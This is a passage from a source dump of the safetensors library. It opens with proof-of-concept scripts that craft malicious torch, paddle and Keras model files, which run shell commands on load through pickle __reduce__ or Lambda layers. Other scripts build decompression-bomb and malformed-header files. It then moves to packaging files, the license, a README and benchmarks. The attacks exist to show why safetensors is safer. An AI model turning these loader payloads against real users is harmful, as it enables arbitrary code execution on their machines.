with outzip.open("weights.npy", "w", force_zip64=True) as f: 9 | for i in range(FILESIZE): 10 | f.write(BUFFER) 11 | -------------------------------------------------------------------------------- /attacks/numpy_dos_get_pwned.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | import numpy as np 4 | 5 | filename = "numpy_dos.npz" 6 | 7 | print( 8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine." 9 | ) 10 | print("Be careful this might crash your computer by reserving way too much RAM") 11 | input("Press Enter to continue") 12 | archive = np.load(filename) 13 | weights = archive["weight"] 14 | assert np.allclose(weights, np.zeros((2, 2))) 15 | print("The file looks fine !") 16 | -------------------------------------------------------------------------------- /attacks/paddle_ace_create.py: -------------------------------------------------------------------------------- 1 | import paddle 2 | import numpy as np 3 | from collections import Iterable, OrderedDict 4 | 5 | def _parse_every_object(obj, condition_func, convert_func): 6 | if condition_func(obj): 7 | return convert_func(obj) 8 | elif isinstance(obj, (dict, OrderedDict, list)): 9 | if isinstance(obj, list): 10 | keys = range(len(obj)) 11 | else: 12 | keys = list(obj.keys()) 13 | for key in keys: 14 | if condition_func(obj[key]): 15 | obj[key] = convert_func(obj[key]) 16 | else: 17 | obj[key] = _parse_every_object( 18 | obj[key], condition_func, convert_func 19 | ) 20 | return obj 21 | elif isinstance(obj, tuple): 22 | return tuple( 23 | _parse_every_object(list(obj), condition_func, convert_func) 24 | ) 25 | elif isinstance(obj, set): 26 | object(list(obj), condition_func, convert_func) 27 | else: 28 | return obj 29 | 30 | # hack _parse_every_object method 31 | paddle.framework.io._parse_every_object = _parse_every_object 32 | 33 | class BadDict(dict): 34 | def __init__(self, src: str, **kwargs): 35 | super().__init__(**kwargs) 36 | self.src = src 37 | 38 | def __reduce__(self): 39 | return ( 40 | eval, 41 | (f"os.system('{self.src}') or dict()",), 42 | None, 43 | None, 44 | iter(self.items()), 45 | ) 46 | 47 | paddle.save( 48 | [BadDict( 49 | 'echo "pwned your computer, I can do anything I want."', 50 | **{"weight": paddle.zeros((2, 2))}, 51 | )], 52 | "paddle_ace.pdparams", 53 | ) 54 | -------------------------------------------------------------------------------- /attacks/paddle_ace_get_pwned.py: -------------------------------------------------------------------------------- 1 | import paddle 2 | 3 | weights = paddle.load("paddle_ace.pdparams")[0] 4 | assert list(weights.keys()) == ["weight"] 5 | assert paddle.allclose(weights["weight"], paddle.zeros((2, 2))) 6 | print("The file looks fine !") 7 | -------------------------------------------------------------------------------- /attacks/safetensors_abuse_attempt_1.py: -------------------------------------------------------------------------------- 1 | import torch 2 | from safetensors.torch import load_file, save_file 3 | 4 | filename = "safetensors_abuse_attempt_1.safetensors" 5 | 6 | 7 | def create_payload(): 8 | weights = {"weight": torch.zeros((2, 2))} 9 | save_file(weights, filename) 10 | 11 | with open(filename, "r+b") as f: 12 | f.seek(0) 13 | # Now the header claims 2**32 - xx even though the file is small 14 | n = 1000 15 | n_bytes = n.to_bytes(8, "little") 16 | f.write(n_bytes) 17 | 18 | 19 | create_payload() 20 | # This properly crashes with an out of bounds exception. 21 | test = load_file(filename) 22 | -------------------------------------------------------------------------------- /attacks/safetensors_abuse_attempt_2.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import json 3 | import os 4 | 5 | from safetensors.torch import load_file 6 | 7 | filename = "safetensors_abuse_attempt_2.safetensors" 8 | 9 | 10 | def create_payload(): 11 | shape = [2, 2] 12 | n = shape[0] * shape[1] * 4 13 | 14 | metadata = { 15 | f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 1000 * 10) 16 | } 17 | 18 | binary = json.dumps(metadata).encode("utf-8") 19 | n = len(binary) 20 | n_header = n.to_bytes(8, "little") 21 | 22 | with open(filename, "wb") as f: 23 | f.write(n_header) 24 | f.write(binary) 25 | f.write(b"\0" * n) 26 | 27 | 28 | create_payload() 29 | 30 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo") 31 | start = datetime.datetime.now() 32 | test = load_file(filename) 33 | print(f"Loading the file took {datetime.datetime.now() - start}") 34 | -------------------------------------------------------------------------------- /attacks/safetensors_abuse_attempt_3.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import json 3 | import os 4 | 5 | from safetensors.torch import load_file 6 | 7 | filename = "safetensors_abuse_attempt_2.safetensors" 8 | 9 | 10 | def create_payload(): 11 | shape = [200, 200] 12 | n = shape[0] * shape[1] * 4 13 | 14 | metadata = {f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 100)} 15 | 16 | binary = json.dumps(metadata).encode("utf-8") 17 | n = len(binary) 18 | n_header = n.to_bytes(8, "little") 19 | 20 | with open(filename, "wb") as f: 21 | f.write(n_header) 22 | f.write(binary) 23 | f.write(b"\0" * n) 24 | 25 | 26 | create_payload() 27 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo") 28 | start = datetime.datetime.now() 29 | test = load_file(filename) 30 | print(f"Loading the file took {datetime.datetime.now() - start}") 31 | -------------------------------------------------------------------------------- /attacks/tf_ace_create.py: -------------------------------------------------------------------------------- 1 | import tensorflow as tf 2 | 3 | 4 | def exec_(*args, **kwargs): 5 | import os 6 | 7 | os.system('echo "########################################\nI own you.\n########################################"') 8 | return 10 9 | 10 | 11 | num_classes = 10 12 | input_shape = (28, 28, 1) 13 | 14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")]) 15 | 16 | 17 | ### 18 | # model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"]) 19 | 20 | model.save("tf_ace.h5") 21 | ### 22 | -------------------------------------------------------------------------------- /attacks/tf_ace_get_pwned.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import json 3 | 4 | import h5py 5 | import tensorflow as tf 6 | 7 | new_model = tf.keras.models.load_model("tf.h5") 8 | 9 | print("Transformers is not vulnerable to this, as it uses h5 directly.") 10 | print("Keras uses a pickled code of the function within the `h5` attrs of the file") 11 | print("Let's show you the marshalled code") 12 | 13 | with h5py.File("tf_ace.h5") as f: 14 | data = json.loads(f.attrs["model_config"]) 15 | print(base64.b64decode(data["config"]["layers"][-1]["config"]["function"][0])) 16 | pass 17 | -------------------------------------------------------------------------------- /attacks/tf_safe_ace_create.py: -------------------------------------------------------------------------------- 1 | import tensorflow as tf 2 | 3 | 4 | def exec_(*args, **kwargs): 5 | import os 6 | 7 | os.system('echo "########################################\nI own you.\n########################################"') 8 | return 10 9 | 10 | 11 | num_classes = 10 12 | input_shape = (28, 28, 1) 13 | 14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")]) 15 | 16 | 17 | model.save("tf_ace.keras", save_format="keras_v3") 18 | -------------------------------------------------------------------------------- /attacks/tf_safe_ace_get_pwned.py: -------------------------------------------------------------------------------- 1 | import tensorflow as tf 2 | 3 | new_model = tf.keras.models.load_model("tf_ace.keras") 4 | -------------------------------------------------------------------------------- /attacks/torch_ace_create.py: -------------------------------------------------------------------------------- 1 | import torch 2 | 3 | 4 | class BadDict(dict): 5 | def __init__(self, src: str, **kwargs): 6 | super().__init__(**kwargs) 7 | self.src = src 8 | 9 | def __reduce__(self): 10 | return ( 11 | eval, 12 | (f"os.system('{self.src}') or dict()",), 13 | None, 14 | None, 15 | iter(self.items()), 16 | ) 17 | 18 | 19 | torch.save( 20 | BadDict( 21 | 'echo "pwned your computer, I can do anything I want."', 22 | **{"weight": torch.zeros((2, 2))}, 23 | ), 24 | "torch_ace.pt", 25 | ) 26 | -------------------------------------------------------------------------------- /attacks/torch_ace_get_pwned.py: -------------------------------------------------------------------------------- 1 | import torch 2 | 3 | weights = torch.load("torch_ace.pt") 4 | assert list(weights.keys()) == ["weight"] 5 | assert torch.allclose(weights["weight"], torch.zeros((2, 2))) 6 | print("The file looks fine !") 7 | -------------------------------------------------------------------------------- /attacks/torch_dos_create.py: -------------------------------------------------------------------------------- 1 | import os 2 | from zipfile import ZIP_DEFLATED, ZipFile 3 | 4 | import torch 5 | 6 | FILESIZE = 40 * 1000 # 40 Go 7 | BUFFER = b"\0" * 1000 * 1000 # 1 Mo 8 | 9 | filename = "torch_dos_tmp.pt" 10 | torch.save({"weight": torch.zeros((2, 2))}, filename) 11 | 12 | 13 | with ZipFile(filename, "r") as torch_zip: 14 | outfilename = "torch_dos.pt" 15 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip: 16 | outzip.writestr("archive/data.pkl", torch_zip.open("archive/data.pkl").read()) 17 | outzip.writestr("archive/version", torch_zip.open("archive/version").read()) 18 | with outzip.open("archive/data/0", "w", force_zip64=True) as f: 19 | for i in range(FILESIZE): 20 | f.write(BUFFER) 21 | 22 | os.remove(filename) 23 | -------------------------------------------------------------------------------- /attacks/torch_dos_get_pwned.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | import torch 4 | 5 | filename = "torch_dos.pt" 6 | 7 | print( 8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine." 9 | ) 10 | print("Be careful this might crash your computer by reserving way too much RAM") 11 | input("Press Enter to continue") 12 | weights = torch.load(filename) 13 | assert list(weights.keys()) == ["weight"] 14 | assert torch.allclose(weights["weight"], torch.zeros((2, 2))) 15 | print("The file looks fine !") 16 | -------------------------------------------------------------------------------- /bindings/python/.gitignore: -------------------------------------------------------------------------------- 1 | /target 2 | 3 | # Byte-compiled / optimized / DLL files 4 | __pycache__/ 5 | .pytest_cache/ 6 | *.py[cod] 7 | 8 | # C extensions 9 | *.so 10 | 11 | # Distribution / packaging 12 | .Python 13 | .venv/ 14 | env/ 15 | bin/ 16 | build/ 17 | develop-eggs/ 18 | dist/ 19 | eggs/ 20 | lib/ 21 | lib64/ 22 | parts/ 23 | sdist/ 24 | var/ 25 | include/ 26 | man/ 27 | venv/ 28 | *.egg-info/ 29 | .installed.cfg 30 | *.egg 31 | 32 | # Installer logs 33 | pip-log.txt 34 | pip-delete-this-directory.txt 35 | pip-selfcheck.json 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .cache 42 | nosetests.xml 43 | coverage.xml 44 | 45 | # Translations 46 | *.mo 47 | 48 | # Mr Developer 49 | .mr.developer.cfg 50 | .project 51 | .pydevproject 52 | 53 | # Rope 54 | .ropeproject 55 | 56 | # Django stuff: 57 | *.log 58 | *.pot 59 | 60 | .DS_Store 61 | 62 | # Sphinx documentation 63 | docs/_build/ 64 | 65 | # PyCharm 66 | .idea/ 67 | 68 | # VSCode 69 | .vscode/ 70 | 71 | # Pyenv 72 | .python-version -------------------------------------------------------------------------------- /bindings/python/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "safetensors-python" 3 | version = "0.5.3-dev.0" 4 | edition = "2021" 5 | rust-version = "1.74" 6 | 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 8 | [lib] 9 | name = "safetensors_rust" 10 | crate-type = ["cdylib"] 11 | 12 | [dependencies] 13 | pyo3 = { version = "0.24", features = ["abi3", "abi3-py38"] } 14 | memmap2 = "0.9" 15 | serde_json = "1.0" 16 | 17 | [dependencies.safetensors] 18 | path = "../../safetensors" 19 | -------------------------------------------------------------------------------- /bindings/python/LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /bindings/python/MANIFEST.in: -------------------------------------------------------------------------------- 1 | include Cargo.toml 2 | include pyproject.toml 3 | include rust-toolchain 4 | include ../../LICENSE 5 | recursive-include src * 6 | recursive-include safetensors-lib * 7 | recursive-exclude safetensors-lib/target * 8 | -------------------------------------------------------------------------------- /bindings/python/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: deps_table_update modified_only_fixup extra_style_checks quality style fixup fix-copies test test-examples 2 | 3 | # make sure to test the local checkout in scripts and not the pre-installed one (don't use quotes!) 4 | export PYTHONPATH = src 5 | 6 | check_dirs := tests py_src 7 | 8 | modified_only_fixup: 9 | $(eval modified_py_files := $(shell python utils/get_modified_files.py $(check_dirs))) 10 | @if test -n "$(modified_py_files)"; then \ 11 | echo "Checking/fixing $(modified_py_files)"; \ 12 | black --preview $(modified_py_files); \ 13 | isort $(modified_py_files); \ 14 | flake8 $(modified_py_files); \ 15 | else \ 16 | echo "No library .py files were modified"; \ 17 | fi 18 | 19 | 20 | quality: 21 | black --check --preview $(check_dirs) 22 | isort --check-only $(check_dirs) 23 | flake8 $(check_dirs) 24 | # doc-builder style src/transformers docs/source --max_len 119 --check_only --path_to_docs docs/source 25 | 26 | style: 27 | black --preview $(check_dirs) 28 | isort $(check_dirs) 29 | 30 | # Super fast fix and check target that only works on relevant modified files since the branch was made 31 | 32 | fixup: modified_only_fixup 33 | 34 | test: 35 | python -m pytest -n auto --dist=loadfile -s -v ./tests/ 36 | -------------------------------------------------------------------------------- /bindings/python/README.md: -------------------------------------------------------------------------------- 1 | ## Installation 2 | 3 | ``` 4 | pip install safetensors 5 | ``` 6 | 7 | 8 | ## Usage 9 | 10 | ### Numpy 11 | 12 | ```python 13 | from safetensors.numpy import save_file, load_file 14 | import numpy as np 15 | 16 | tensors = { 17 | "a": np.zeros((2, 2)), 18 | "b": np.zeros((2, 3), dtype=np.uint8) 19 | } 20 | 21 | save_file(tensors, "./model.safetensors") 22 | 23 | 24 | # Now loading 25 | loaded = load_file("./model.safetensors") 26 | ``` 27 | 28 | ### Torch 29 | 30 | ```python 31 | from safetensors.torch import save_file, load_file 32 | import torch 33 | 34 | tensors = { 35 | "a": torch.zeros((2, 2)), 36 | "b": torch.zeros((2, 3), dtype=torch.uint8) 37 | } 38 | 39 | save_file(tensors, "./model.safetensors") 40 | 41 | 42 | # Now loading 43 | loaded = load_file("./model.safetensors") 44 | ``` 45 | 46 | ### Developing 47 | 48 | ``` 49 | # inside ./safetensors/bindings/python 50 | pip install .[dev] 51 | ``` 52 | Should be enough to install this library locally. 53 | 54 | ### Testing 55 | 56 | ``` 57 | # inside ./safetensors/bindings/python 58 | pip install .[dev] 59 | pytest -sv tests/ 60 | ``` 61 | -------------------------------------------------------------------------------- /bindings/python/benches/test_flax.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import jax.numpy as jnp 5 | from flax.serialization import msgpack_restore, msgpack_serialize 6 | from safetensors.flax import load_file, save_file 7 | 8 | 9 | def create_gpt2(n_layers: int): 10 | tensors = {} 11 | tensors["wte"] = jnp.zeros((50257, 768)) 12 | tensors["wpe"] = jnp.zeros((1024, 768)) 13 | for i in range(n_layers): 14 | tensors[f"h.{i}.ln_1.weight"] = jnp.zeros((768,)) 15 | tensors[f"h.{i}.ln_1.bias"] = jnp.zeros((768,)) 16 | tensors[f"h.{i}.attn.bias"] = jnp.zeros((1, 1, 1024, 1024)) 17 | tensors[f"h.{i}.attn.c_attn.weight"] = jnp.zeros((768, 2304)) 18 | tensors[f"h.{i}.attn.c_attn.bias"] = jnp.zeros((2304)) 19 | tensors[f"h.{i}.attn.c_proj.weight"] = jnp.zeros((768, 768)) 20 | tensors[f"h.{i}.attn.c_proj.bias"] = jnp.zeros((768)) 21 | tensors[f"h.{i}.ln_2.weight"] = jnp.zeros((768)) 22 | tensors[f"h.{i}.ln_2.bias"] = jnp.zeros((768)) 23 | tensors[f"h.{i}.mlp.c_fc.weight"] = jnp.zeros((768, 3072)) 24 | tensors[f"h.{i}.mlp.c_fc.bias"] = jnp.zeros((3072)) 25 | tensors[f"h.{i}.mlp.c_proj.weight"] = jnp.zeros((3072, 768)) 26 | tensors[f"h.{i}.mlp.c_proj.bias"] = jnp.zeros((768)) 27 | tensors["ln_f.weight"] = jnp.zeros((768)) 28 | tensors["ln_f.bias"] = jnp.zeros((768)) 29 | return tensors 30 | 31 | 32 | def load(filename): 33 | with open(filename, "rb") as f: 34 | data = f.read() 35 | flax_weights = msgpack_restore(data) 36 | return flax_weights 37 | 38 | 39 | def test_flax_flax_load(benchmark): 40 | # benchmark something 41 | weights = create_gpt2(12) 42 | with tempfile.NamedTemporaryFile(delete=False) as f: 43 | serialized = msgpack_serialize(weights) 44 | f.write(serialized) 45 | result = benchmark(load, f.name) 46 | os.unlink(f.name) 47 | 48 | for k, v in weights.items(): 49 | tv = result[k] 50 | assert jnp.allclose(v, tv) 51 | 52 | 53 | def test_flax_sf_load(benchmark): 54 | # benchmark something 55 | weights = create_gpt2(12) 56 | with tempfile.NamedTemporaryFile(delete=False) as f: 57 | save_file(weights, f.name) 58 | result = benchmark(load_file, f.name) 59 | os.unlink(f.name) 60 | 61 | for k, v in weights.items(): 62 | tv = result[k] 63 | assert jnp.allclose(v, tv) 64 | -------------------------------------------------------------------------------- /bindings/python/benches/test_mlx.py: -------------------------------------------------------------------------------- 1 | import os 2 | import platform 3 | import tempfile 4 | 5 | 6 | if platform.system() == "Darwin": 7 | import mlx.core as mx 8 | from safetensors.mlx import load_file, save_file 9 | 10 | def create_gpt2(n_layers: int): 11 | tensors = {} 12 | tensors["wte"] = mx.zeros((50257, 768)) 13 | tensors["wpe"] = mx.zeros((1024, 768)) 14 | for i in range(n_layers): 15 | tensors[f"h.{i}.ln_1.weight"] = mx.zeros((768,)) 16 | tensors[f"h.{i}.ln_1.bias"] = mx.zeros((768,)) 17 | tensors[f"h.{i}.attn.bias"] = mx.zeros((1, 1, 1024, 1024)) 18 | tensors[f"h.{i}.attn.c_attn.weight"] = mx.zeros((768, 2304)) 19 | tensors[f"h.{i}.attn.c_attn.bias"] = mx.zeros((2304)) 20 | tensors[f"h.{i}.attn.c_proj.weight"] = mx.zeros((768, 768)) 21 | tensors[f"h.{i}.attn.c_proj.bias"] = mx.zeros((768)) 22 | tensors[f"h.{i}.ln_2.weight"] = mx.zeros((768)) 23 | tensors[f"h.{i}.ln_2.bias"] = mx.zeros((768)) 24 | tensors[f"h.{i}.mlp.c_fc.weight"] = mx.zeros((768, 3072)) 25 | tensors[f"h.{i}.mlp.c_fc.bias"] = mx.zeros((3072)) 26 | tensors[f"h.{i}.mlp.c_proj.weight"] = mx.zeros((3072, 768)) 27 | tensors[f"h.{i}.mlp.c_proj.bias"] = mx.zeros((768)) 28 | tensors["ln_f.weight"] = mx.zeros((768)) 29 | tensors["ln_f.bias"] = mx.zeros((768)) 30 | return tensors 31 | 32 | def load(filename): 33 | return mx.load(filename) 34 | 35 | def test_mlx_mlx_load(benchmark): 36 | # benchmark something 37 | weights = create_gpt2(12) 38 | with tempfile.NamedTemporaryFile(delete=False) as f: 39 | filename = f"{f.name}.npz" 40 | mx.savez(filename, **weights) 41 | result = benchmark(load, filename) 42 | os.unlink(f.name) 43 | 44 | for k, v in weights.items(): 45 | tv = result[k] 46 | assert mx.allclose(v, tv) 47 | 48 | def test_mlx_sf_load(benchmark): 49 | # benchmark something 50 | weights = create_gpt2(12) 51 | with tempfile.NamedTemporaryFile(delete=False) as f: 52 | save_file(weights, f.name) 53 | result = benchmark(load_file, f.name) 54 | os.unlink(f.name) 55 | 56 | for k, v in weights.items(): 57 | tv = result[k] 58 | assert mx.allclose(v, tv) 59 | -------------------------------------------------------------------------------- /bindings/python/benches/test_paddle.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import numpy as np 5 | 6 | import paddle 7 | from safetensors.paddle import load_file, save_file 8 | 9 | 10 | def create_gpt2(n_layers: int): 11 | tensors = {} 12 | tensors["wte"] = paddle.zeros((50257, 768)) 13 | tensors["wpe"] = paddle.zeros((1024, 768)) 14 | for i in range(n_layers): 15 | tensors[f"h.{i}.ln_1.weight"] = paddle.zeros((768,)) 16 | tensors[f"h.{i}.ln_1.bias"] = paddle.zeros((768,)) 17 | tensors[f"h.{i}.attn.bias"] = paddle.zeros((1, 1, 1024, 1024)) 18 | tensors[f"h.{i}.attn.c_attn.weight"] = paddle.zeros((768, 2304)) 19 | tensors[f"h.{i}.attn.c_attn.bias"] = paddle.zeros((2304,)) 20 | tensors[f"h.{i}.attn.c_proj.weight"] = paddle.zeros((768, 768)) 21 | tensors[f"h.{i}.attn.c_proj.bias"] = paddle.zeros((768,)) 22 | tensors[f"h.{i}.ln_2.weight"] = paddle.zeros((768,)) 23 | tensors[f"h.{i}.ln_2.bias"] = paddle.zeros((768,)) 24 | tensors[f"h.{i}.mlp.c_fc.weight"] = paddle.zeros((768, 3072)) 25 | tensors[f"h.{i}.mlp.c_fc.bias"] = paddle.zeros((3072,)) 26 | tensors[f"h.{i}.mlp.c_proj.weight"] = paddle.zeros((3072, 768)) 27 | tensors[f"h.{i}.mlp.c_proj.bias"] = paddle.zeros((768,)) 28 | tensors["ln_f.weight"] = paddle.zeros((768,)) 29 | tensors["ln_f.bias"] = paddle.zeros((768,)) 30 | return tensors 31 | 32 | 33 | def test_paddle_paddle_load(benchmark): 34 | # benchmark something 35 | weights = create_gpt2(12) 36 | with tempfile.NamedTemporaryFile(delete=False) as f: 37 | paddle.save(weights, f.name) 38 | result = benchmark(paddle.load, f.name) 39 | os.unlink(f.name) 40 | 41 | for k, v in weights.items(): 42 | tv = result[k] 43 | assert paddle.allclose(v, tv) 44 | 45 | 46 | def test_paddle_sf_load(benchmark): 47 | # benchmark something 48 | weights = create_gpt2(12) 49 | with tempfile.NamedTemporaryFile(delete=False) as f: 50 | save_file(weights, f.name) 51 | result = benchmark(load_file, f.name) 52 | os.unlink(f.name) 53 | 54 | for k, v in weights.items(): 55 | tv = result[k] 56 | assert np.allclose(v, tv) 57 | -------------------------------------------------------------------------------- /bindings/python/benches/test_pt.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import pytest 5 | import torch 6 | 7 | from safetensors.torch import load_file, save_file 8 | 9 | 10 | def create_gpt2(n_layers: int): 11 | tensors = {} 12 | tensors["wte"] = torch.zeros((50257, 